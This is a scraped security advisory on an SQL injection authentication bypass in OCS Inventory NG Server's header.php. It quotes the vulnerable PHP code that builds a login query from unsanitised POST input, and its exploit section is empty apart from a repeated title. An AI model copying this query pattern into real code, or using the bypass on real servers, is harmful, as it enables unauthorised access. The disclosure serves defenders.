OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

2010-02-0400:00:00

vulners.com

JSON

Software : Open Computer and Software (OCS) Inventory NG
Download : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version : 1.03-beta3 and prior
Impact : Critical
Remote : Yes (No authentication is needed)

== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.

The vulnerability is a sql injection which exists in header.php file.
Attacker could pass a special sql string which can used to create/modify
information stored in the database or authenticated in any user.

script : header.php

102 if(isset($_POST["login"])) {
103 $req="SELECT id, accesslvl, passwd FROM operators WHERE
id='".$_POST["login"]."'";
104 $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());
105
106 if($row=@mysql_fetch_object($res))
107 {
108 // DL 25/08/2005
109 // Support new MD5 encrypted password or old clear password
for login only
110 if (($row->passwd != md5( $_POST["pass"])) and
111 ($row->passwd != $_POST["pass"])) {

== Exploit ==

JSON

OCS Inventory NG Server &lt;= 1.3b3 &#40;login&#41; Remote Authentication Bypass

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass